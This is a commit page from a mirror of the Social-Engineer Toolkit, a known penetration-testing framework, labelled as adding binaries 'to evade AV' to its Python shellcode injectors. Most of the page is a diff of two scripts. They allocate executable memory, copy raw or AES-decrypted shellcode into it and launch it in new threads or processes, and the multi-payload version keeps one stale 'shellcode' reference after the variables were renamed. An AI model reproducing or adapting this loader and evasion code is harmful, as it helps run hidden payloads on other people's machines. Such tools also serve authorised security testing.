Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-12-01 00:39:09 +00:00
Code Issues Projects Releases Packages Wiki Activity

Added new binaries to evade AV to pyinjector and multipyinjector

Browse source
This commit is contained in:
TrustedSec 2013-06-18 03:46:20 -04:00
parent 8b1213c9e1
commit e1e4fe1e5e
4 changed files with 20 additions and 23 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

BIN
src/payloads/set_payloads/multi_pyinjector.binary Normal file → Executable file
View file

Binary file not shown.

26
src/payloads/set_payloads/multi_pyinjector.py
View file

@ -1,6 +1,6 @@
# #
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version. # The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
# Version: 0.2 # Version: 0.3
# #
# This will spawn only a seperate thread per each shellcode instance. # This will spawn only a seperate thread per each shellcode instance.
# #
@ -18,19 +18,19 @@ from Crypto.Cipher import AES
import multiprocessing import multiprocessing
# define our shellcode injection code through ctypes # define our shellcode injection code through ctypes
def inject(shellcode): def injection(sc):
shellcode = shellcode.decode("string_escape") sc = sc.decode("string_escape")
shellcode = bytearray(shellcode) sc = bytearray(sc)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)), ctypes.c_int(len(sc)),
ctypes.c_int(0x3000), ctypes.c_int(0x3000),
ctypes.c_int(0x40)) ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode))) ctypes.c_int(len(sc)))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) buf = (ctypes.c_char * len(shellcode)).from_buffer(sc)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf, buf,
ctypes.c_int(len(shellcode))) ctypes.c_int(len(sc)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0), ctypes.c_int(0),
ctypes.c_int(ptr), ctypes.c_int(ptr),
@ -50,7 +50,7 @@ if __name__ == '__main__':
payload_filename = sys.argv[1] payload_filename = sys.argv[1]
if os.path.isfile(payload_filename): if os.path.isfile(payload_filename):
fileopen = file(payload_filename, "r") fileopen = file(payload_filename, "r")
shellcode = fileopen.read() sc = fileopen.read()
# if we didn't file our shellcode path then exit out # if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename): if not os.path.isfile(payload_filename):
sys.exit() sys.exit()
@ -70,17 +70,17 @@ if __name__ == '__main__':
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING) DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret) cipher = AES.new(secret)
# our decrypted value for shellcode # our decrypted value for shellcode
shellcode = DecryptAES(cipher, shellcode) sc = DecryptAES(cipher, sc)
# split our shellcode into a list # split our shellcode into a list
shellcode = shellcode.split(",") sc = sc.split(",")
# except an indexerror and allow it to continue forward # except an indexerror and allow it to continue forward
except IndexError: except IndexError:
sys.exit() sys.exit()
jobs = [] jobs = []
for payload in shellcode: for payload in sc:
if payload != "": if payload != "":
p = multiprocessing.Process(target=inject, args=(payload,)) p = multiprocessing.Process(target=injection, args=(payload,))
jobs.append(p) jobs.append(p)
p.start() p.start()

BIN
src/payloads/set_payloads/pyinjector.binary
View file

Binary file not shown.

17
src/payloads/set_payloads/pyinjector_args.py Normal file → Executable file
View file

@ -9,38 +9,35 @@ import sys
# see if we specified shellcode # see if we specified shellcode
try: try:
shellcode = sys.argv[1] sc = sys.argv[1]
# if we didn't specify a param # if we didn't specify a param
except IndexError: except IndexError:
print "Python Shellcode Injector: Written by Dave Kennedy at TrustedSec"
print "Example: pyinjector.exe \\x41\\x41\\x41\\x41"
print "Usage: pyinjector.exe <shellcode>"
sys.exit() sys.exit()
# need to code the input into the right format through string escape # need to code the input into the right format through string escape
shellcode = shellcode.decode("string_escape") sc = sc.decode("string_escape")
# convert to bytearray # convert to bytearray
shellcode = bytearray(shellcode) sc = bytearray(sc)
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace # use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)), ctypes.c_int(len(sc)),
ctypes.c_int(0x3000), ctypes.c_int(0x3000),
ctypes.c_int(0x40)) ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space # use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode))) ctypes.c_int(len(sc)))
# read in the buffer # read in the buffer
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) buf = (ctypes.c_char * len(sc)).from_buffer(sc)
# moved the memory in 4 byte blocks # moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf, buf,
ctypes.c_int(len(shellcode))) ctypes.c_int(len(sc)))
# launch in a thread # launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0), ctypes.c_int(0),